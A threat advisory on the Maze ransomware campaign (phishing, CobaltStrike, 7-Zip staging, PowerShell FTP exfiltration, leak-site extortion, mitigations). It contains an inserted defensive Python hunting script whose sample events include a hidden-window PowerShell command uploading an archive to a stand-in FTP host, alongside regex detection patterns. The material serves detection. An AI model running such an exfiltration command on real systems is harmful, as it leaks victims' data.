Threat Advisory: Re-Emergence of the Maze Ransomware
April 20, 2020
Herjavec Group continues to track COVID-19 related cyberattacks. We have a complete threat advisory tracking various threats, malware types, as well as a summary of IOCs and domains specific to COVID-19. The full advisory can be found here.
The Maze ransomware was initially discovered in May 2019, and since then the attack frequency has increased and the group behind it has brought new traits to the forefront. The group conducted a large number of campaigns in late 2019 and has not slowed down since the emergence of the COVID-19 pandemic.
The campaign starts with a phishing email designed to compromise a single host, and on multiple occasions a CobaltStrike payload has been observed at this stage. CobaltStrike is an offensive framework typically used by Red Team operators in security exercises; once a foothold is established, the operators use it to deploy additional tools and malware and move laterally throughout the network.
Once the threat group gains access to the network, the priority is to expand the footprint by compromising and gathering data from other hosts by leveraging exploit kits and remote desktop connections with weak passwords. After the group has access to a number of systems and accumulates enough data, they use 7-Zip to compress the data before exfiltrating it to a remote FTP server using PowerShell. Lastly, the Maze ransomware is deployed to all compromised systems.
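The staging sequence described above (7-Zip archiving followed by a PowerShell FTP upload from the same host) is one a defender can hunt for in process-creation telemetry. The following Python is an added example and not code from the advisory or from Herjavec Group; the sample events, hostnames, paths and TEST-NET IP address are constructed, and the command-line patterns and 30-minute correlation window are assumptions to tune for your own environment.

```python
import re
from datetime import datetime, timedelta

# Constructed sample process-creation events (e.g. Sysmon Event ID 4688/1 style);
# these are illustrative, not indicators from the advisory.
EVENTS = [
    {"ts": "2020-04-20T10:01:00", "host": "ws01",
     "image": r"C:\Windows\System32\notepad.exe", "cmd": "notepad.exe report.txt"},
    {"ts": "2020-04-20T10:05:00", "host": "ws02",
     "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmd": r"7z.exe a -p -mhe=on C:\Temp\out.7z C:\Shares\Finance"},
    {"ts": "2020-04-20T10:09:00", "host": "ws02",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -nop -w hidden $c=New-Object System.Net.WebClient;"
            r"$c.UploadFile('ftp://198.51.100.7/u/out.7z','C:\Temp\out.7z')"},
    {"ts": "2020-04-20T11:00:00", "host": "ws03",
     "image": r"C:\Program Files\7-Zip\7z.exe", "cmd": "7z.exe x installer.7z"},
]

# 7-Zip "add to archive" invocations (7z.exe, 7za.exe or 7zg.exe followed by the 'a' verb).
ARCHIVE_RE = re.compile(r"\b7z[ag]?\.exe\s+a\b", re.I)
# PowerShell command lines that speak FTP (URI scheme or .NET upload APIs).
FTP_UPLOAD_RE = re.compile(r"ftp://|UploadFile|FtpWebRequest", re.I)
WINDOW = timedelta(minutes=30)  # assumed correlation window


def find_exfil_chains(events, window=WINDOW):
    """Return (host, archive_ts, upload_ts) for every host on which a 7-Zip
    archive creation is followed, within `window`, by a PowerShell FTP upload."""
    by_host = {}
    for e in sorted(events, key=lambda e: e["ts"]):
        by_host.setdefault(e["host"], []).append(e)
    hits = []
    for host, evs in by_host.items():
        archives = [e for e in evs if ARCHIVE_RE.search(e["cmd"])]
        uploads = [e for e in evs
                   if e["image"].lower().endswith("powershell.exe")
                   and FTP_UPLOAD_RE.search(e["cmd"])]
        for a in archives:
            ta = datetime.fromisoformat(a["ts"])
            for u in uploads:
                tu = datetime.fromisoformat(u["ts"])
                if timedelta(0) <= tu - ta <= window:
                    hits.append((host, a["ts"], u["ts"]))
    return hits


if __name__ == "__main__":
    for host, t_archive, t_upload in find_exfil_chains(EVENTS):
        print(f"possible staging/exfil on {host}: archive {t_archive}, upload {t_upload}")
```

Only the host that both archives data and then uploads over FTP is flagged; an extraction (`7z.exe x`) on its own is not.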
Since the goal of ransomware is to exploit the victims for financial payment, Maze is configured to exfiltrate the data from the compromised host. If no payment is made, the threat group posts the data on its public website as proof of compromise. This maneuver acts as an additional incentive for organizations to pay the ransom despite being able to fully restore the infected machines and recover the data.
As a result, this extortion tactic has also started to be adopted by other ransomware operators (e.g. REvil/Sodinokibi) to increase the likelihood of organizations paying the ransom demanded.
Known verticals targeted by Maze include legal, oil and gas, online gambling, insurance providers, utility equipment suppliers, logistics, construction, government, manufacturing, medical research, consulting, engineering, and higher education.
In order to reduce the risk of falling victim to the Maze ransomware, it is imperative your team manages a strong security awareness program and proactively messages employees around the threat of phishing emails. Employees should never open suspicious emails, download attachments or click on URLs without validating the sender or the content’s legitimacy.
HG also recommends:
- Having a strong backup policy in place with periodic backups that are stored off of the network
- Being up-to-date on your antivirus software licenses
- Maintaining strong cyber hygiene with up-to-date system patches
- Disabling Remote Desktop Connections that are not needed
For Herjavec Group Managed Security Services Customers, Herjavec Group’s Managed Services team will be proactively blocking names/IP addresses where applicable, following documented change processes as per usual.
For more information on how Herjavec Group can help your organization with an emergency preparedness plan, Managed Phishing program, or cyber technology support, please connect with us.
Herjavec Group circulates US-CERT/CISA advisories as this notification warrants attention and may have significance to your Enterprise network environment. If the following advisory is applicable to your environment, Herjavec Group recommends your IT team review the technical details included and monitor your environment for any susceptible systems. Herjavec Group’s analysts are working with applicable vendor partners to apply detection and mitigation strategies where appropriate. For Managed Services customers, our Managed Services team will engage with the appropriate technical contacts in your respective organizations directly to provide alerts, escalations, actions and/or reports based on our service agreement with you. If you have questions or concerns, please engage your Herjavec Group account representative directly or contact Herjavec Group.